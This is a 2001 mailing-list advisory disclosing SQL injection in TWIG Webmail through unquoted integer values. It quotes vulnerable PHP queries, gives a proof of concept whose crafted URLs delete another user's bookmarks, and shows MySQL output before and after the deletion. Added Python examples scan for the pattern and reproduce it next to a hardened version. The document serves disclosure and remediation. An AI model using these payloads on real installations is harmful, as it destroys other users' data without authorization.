Date: Mon, 28 May 2001 21:00:55 +0700 (JAVT)
From: Luki Rustianto <[email protected]>
To: [email protected]
Subject: TWIG SQL query bugs
I can't find the person who is really in charge of developing twig, so I
am mailing this bug to the person who announced the new version of twig
about two months ago.
--------------------------------------------------------------------------
Subject: Unquoted SQL query => potential damage
Software package: TWIG Webmail
Software Site: HTTP://twig.screwdriver.net
Version tested: 2.6.2 and below (used with MySQL, didn't check others)
Platform: Platform independent with PHP
Result: Any user with a valid email account can delete or change
other users' data in the mysql database.
Proof Of Concept: Attached
Problem Description:
An unquoted value in an SQL query string is a small mistake that can lead to
real damage.
TWIG, a free PHP webmail system, is affected. MySQL accepts an unquoted value
in a query string when the field type is int, mediumint, tinyint or similar.
The query:
DELETE FROM mytable WHERE id='1' AND owner='karet'
has the same effect as:
DELETE FROM mytable WHERE id=1 AND owner='karet'
However, additional caution is needed when the value of 'id' in the example
above is user-supplied data: that user then has control over the SQL query
and can turn it into a modified version like:
DELETE FROM mytable WHERE id=1 OR id=2 OR id=3 AND owner='karet'
~~~~~~~~~~~~~~~~
(modified value)
The modified query string above has, of course, a different meaning :)
The value "$id=1" has been changed to "$id=1 OR id=2 OR id=3". Because AND
binds tighter than OR, MySQL reads this as id=1 OR id=2 OR (id=3 AND
owner='karet'): the owner check guards only the last alternative, and rows
1 and 2 are deleted no matter who owns them.
Running 'grep -r "WHERE id=" <TWIG installation dir>/lib/*' outputs a LOT of
interesting information about which functions build a query string matching
this pattern; the list varies with the TWIG version you have. (Note that the
schedule query below writes 'WHERE id = ' with spaces, so a pattern that
allows whitespace around the '=' catches more.)
Some of them:
groups/personal.groups.inc.php3:
$query = "UPDATE " . $dbconfig["groups_table"] . " SET groupname='" .
$newname . "' WHERE id=" . $groupid;
[... many others]
schedule/schedule.edit.inc.php3:
$query = "DELETE FROM " . $dbconfig["schedule_table"] . " WHERE id = " .
$data["id"] . " AND (" . $groupquery . ")";
[... many others]
... and other files.
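A scan for the same pattern that tolerates the spacing and line breaks TWIG uses, as an added example (not TWIG's code and not the grep from the advisory). The PHP sources below are constructed from the two snippets quoted above plus a hypothetical hardened file that the scan must not flag; the regex, the file names and the hardened lines are illustrative assumptions:

```python
"""Find integer WHERE clauses built by concatenating a PHP variable straight
after the closing quote of the SQL string literal.  Added example, not TWIG's
code; the sample files are constructed from the snippets quoted in the
advisory plus a hypothetical hardened file."""
import os
import re

# `WHERE <col> = " . $var`: the right-hand side of the comparison is the end
# of the string literal followed by a concatenated variable, with no SQL
# quote around it.  \s also matches newlines, so a continuation on the next
# line (as in TWIG's schedule query) is still caught.
UNQUOTED_WHERE = re.compile(r'WHERE\s+[A-Za-z_]\w*\s*=\s*"\s*\.\s*\$')

# Constructed sample sources: two vulnerable snippets from the advisory and
# one hypothetical hardened file (quoted value, and (int)-cast value).
SAMPLE_FILES = {
    "groups/personal.groups.inc.php3": '''$query = "UPDATE " . $dbconfig["groups_table"] . " SET groupname='" .
    $newname . "' WHERE id=" . $groupid;
''',
    "schedule/schedule.edit.inc.php3": '''$query = "DELETE FROM " . $dbconfig["schedule_table"] . " WHERE id = " .
    $data["id"] . " AND (" . $groupquery . ")";
''',
    "hardened/example.inc.php3": '''$query = "DELETE FROM " . $table . " WHERE id='" . $id . "'";
$query = "DELETE FROM " . $table . " WHERE id=" . (int) $id;
''',
}


def find_unquoted_where(files):
    """Return (path, line number of the WHERE keyword, normalised match) for
    every unquoted integer comparison found in the given {path: source} map."""
    hits = []
    for path, source in files.items():
        for m in UNQUOTED_WHERE.finditer(source):
            line_no = source.count("\n", 0, m.start()) + 1
            hits.append((path, line_no, " ".join(m.group(0).split())))
    return hits


def scan_tree(root):
    """Run the same scan over real PHP files under root (e.g. <TWIG dir>/lib)."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith((".php", ".php3", ".inc")):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    files[full] = fh.read()
    return find_unquoted_where(files)


if __name__ == "__main__":
    for path, line_no, text in find_unquoted_where(SAMPLE_FILES):
        print("%s:%d: %s" % (path, line_no, text))
```

Against the constructed sources it reports the groups query (line 2) and the schedule query (line 1); the latter is written 'WHERE id = ' with spaces and continues on the next line, so the plain grep for "WHERE id=" does not see it, while the quoted and (int)-cast forms in the hardened file are left alone. It is a heuristic: a value that is quoted in SQL but never escaped, or that reaches the query through an intermediate variable, still needs a manual read.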
Or, if you really want to see and debug every query TWIG makes, TWIG's own
query layer makes that easy :)
TWIG has a function named 'dbQuery' that is called for every SQL query.
(When used with MySQL it is in <twig dir>/lib/db/mysql.db.inc.php3.)
Add the following code at the top of function dbQuery( $statement )
(shown for TWIG 2.6.2):
[SNIP]
$fp = fopen ("/tmp/twig_sql.log", "a");
fwrite ($fp, $statement . "\n");   /* one statement per line */
fclose($fp);
[/SNIP]
so every SQL statement is appended to the file "/tmp/twig_sql.log".
From that file you can see every action performed and audit it. Do this on
a test installation only: the log holds every user's data in the clear, and
a file created in /tmp with the default umask is readable by every local
account.
Solutions:
=============
Simply put proper quote signs "'" around the value in every query string
that uses an int, mediumint, tinyint or similar field in its WHERE clause.
If the $id value in the example above sits between quotes, the query looks
like:
DELETE FROM mytable WHERE id='1 OR id=2 OR id=3' AND owner='karet'
which no longer reaches other users' rows: MySQL compares an integer column
with a string by the number at the start of that string (here 1), so the
injected text after it is inert and the owner condition applies to the whole
statement again. (In normal operation we cannot inject our own quote "'"
sign, as PHP filters it and changes it to "\'".)
Note that this fix holds only while PHP's magic_quotes_gpc is on, since that
is what turns the "'" into "\'". Casting the value to an integer, for
example (int) $id, or rejecting anything that is not all digits, does not
depend on that setting.
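The unquoted-integer injection from the Problem Description above and the fix discussed under Solutions, reproduced as an added example (not TWIG's code and not part of the original advisory). sqlite3 stands in for MySQL, the table and rows are constructed to match the twig_bookmarks listing in the attached proof of concept, and the hardened function uses digit-only validation plus bound parameters rather than the quoting the advisory proposes, because that does not depend on PHP's magic_quotes setting:

```python
"""Unquoted integer in a WHERE clause, reproduced against the bookmark table
of the proof of concept.  Added example, not TWIG's code: sqlite3 stands in
for MySQL and the rows are constructed to match the PoC listing."""
import re
import sqlite3

# Constructed to match the twig_bookmarks listing in the PoC.
SAMPLE_ROWS = [
    (1, "pohenk", 0, "zzzz"),
    (2, "pohenk", 0, "yyyyy"),
    (3, "eca", 0, "aaaa"),
]

INTEGER_ONLY = re.compile(r"[0-9]+")


def fresh_db():
    """In-memory twig_bookmarks table with the column names used by the PoC."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE twig_bookmarks "
               "(id INTEGER, username TEXT, groupid INTEGER, url TEXT)")
    db.executemany("INSERT INTO twig_bookmarks VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    db.commit()
    return db


def delete_unquoted(db, user, data_id, groupid):
    """The TWIG pattern: data[id] and data[groupid] are concatenated into the
    statement without quotes.  Returns the number of rows deleted."""
    query = ("DELETE FROM twig_bookmarks WHERE id = " + data_id
             + " AND groupid = " + groupid
             + " AND username = '" + user + "'")
    cur = db.execute(query)
    db.commit()
    return cur.rowcount


def delete_hardened(db, user, data_id, groupid):
    """Hardened form: integer fields must be all digits, and every value is
    bound as a parameter, so attacker text is never parsed as SQL.
    Raises ValueError for anything that is not a plain integer."""
    for name, value in (("id", data_id), ("groupid", groupid)):
        if not INTEGER_ONLY.fullmatch(value):
            raise ValueError("%s must be an integer, got %r" % (name, value))
    cur = db.execute(
        "DELETE FROM twig_bookmarks WHERE id = ? AND groupid = ? AND username = ?",
        (int(data_id), int(groupid), user))
    db.commit()
    return cur.rowcount


def remaining_ids(db):
    """ids still in the table, ascending."""
    return [row[0] for row in db.execute("SELECT id FROM twig_bookmarks ORDER BY id")]


if __name__ == "__main__":
    # Attacker 'eca' owns only id 3 but submits data[id]="2 or id=2", the
    # value from the PoC.  AND binds tighter than OR, so the owner check
    # guards only the second alternative and pohenk's row 2 goes.
    db = fresh_db()
    print("unquoted:", delete_unquoted(db, "eca", "2 or id=2", "0"), remaining_ids(db))
    db = fresh_db()
    try:
        delete_hardened(db, "eca", "2 or id=2", "0")
    except ValueError as err:
        print("hardened:", err, remaining_ids(db))
```

delete_unquoted(db, "eca", "2 or id=2", "0") removes pohenk's row 2 even though the statement still ends in username='eca'; with the PoC's second value, "2 or groupid=0", it also removes eca's own group-0 row. delete_hardened rejects both inputs before any SQL is built, and with a plain "2" it deletes nothing, because the owner condition now covers the whole statement.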
NB: thanks to echo for letting me test it (also for the beers ;p).
jenggo <[email protected]>
http://www.karet.org
[Attachment: twig.txt]

===============================================
[Fri Mar  2 21:58:46 JAVT 2001]
TWIG Webmail Unquoted Query String
Proof Of Concept by jenggo <[email protected]>
===============================================
We will try to delete another user's mysql data, in this example 'bookmarks'
data. The same can be done with other data such as 'contacts'.
You must have existing data of your own before you can change/delete others',
so add some first.

-------------------------------------------

Log in as a usual user account ('eca' in this example),
go to the 'bookmarks' option and choose 'edit'.
View the page source and find the important values:

[cut down to the strings we are interested in]

<==>
<hr><form action=/webmail/index.php3 method=POST>
<input type=hidden name=twig_sid value="983392539-1-eca">
<input type=hidden name=twig_cid value="983392539-14-eca">
<input type=hidden name=data[id] value=3>
<input type=hidden name=ItemID value=3>
<==>
   <select name=data[groupid]>
      <option value=0 >Unfiled</option>
<==>
<input type=submit name=submitbutton[delete] value="Delete">
<==>

-------------------------------------------
NOTE:
The URL may look different depending on what type of authentication you use.
I use the sqltable type; if you use the cookies type the URL may be *much*
longer than this!
-------------------------------------------

Construct the exploit URL.

Actual URL:
http://192.168.0.18/webmail/index.php3?ts=983392426&twig_sid=983392414-1-eca&twig_cid=983392414-14-eca&ItemID=3

Change it to:
http://192.168.0.18/webmail/index.php3?ts=983392426&twig_sid=983392539-1-eca&twig_cid=983392539-14-eca&ItemID=2&data[groupid]=0&submitbutton[delete]=Delete&data[id]=2%20or%20id%3d2

-------------------------------------------
NOTE:
we changed the string: ItemID=3 to ItemID=2
we added the string: "&data[groupid]=0&submitbutton[delete]=Delete&data[id]=2%20or%20id%3d2"
(this is it: data[id]=2%20or%20id%3d2, i.e. "2 or id=2")
or for more damage:
http://192.168.0.18/webmail/index.php3?ts=983393006&twig_sid=983393050-1-eca&twig_cid=983393050-14-eca&ItemID=2&data[id]=2%20or%20groupid%3d0&data[groupid]=0&submitbutton[delete]=Delete
(this is it: data[id]=2%20or%20groupid%3d0, i.e. "2 or groupid=0")

so the SQL query changes from:

DELETE FROM twig_bookmarks WHERE id=3 AND groupid=0 AND username='eca'

to:

DELETE FROM twig_bookmarks WHERE id=2 or id=2 AND groupid=0 AND username='eca'

or for more damage (this one also removes all of your own group-0 bookmarks,
since the owner check only guards the second alternative of the OR):

DELETE FROM twig_bookmarks WHERE id=2 or groupid=0 AND groupid=0 AND username='eca'

***************RESULT********************

[From mysql console before the exploit]
mysql> select id,username,groupid,url from twig_bookmarks;
+----+----------+---------+-------+
| id | username | groupid | url   |
+----+----------+---------+-------+
|  1 | pohenk   |       0 | zzzz  |
|  2 | pohenk   |       0 | yyyyy |
|  3 | eca      |       0 | aaaa  |
+----+----------+---------+-------+
3 rows in set (0.21 sec)

[From mysql console after the exploit]
mysql> select id,username,groupid,url from twig_bookmarks;
+----+----------+---------+--------+
| id | username | groupid | url    |
+----+----------+---------+--------+
|  1 | pohenk   |       0 | zzzz   |
|  3 | eca      |       0 | aaaa   |
+----+----------+---------+--------+
2 rows in set (0.02 sec)

As user 'eca' we could delete/update user 'pohenk's data or anything else.


[Fri Mar  2 21:58:46 JAVT 2001] - jenggo <[email protected]>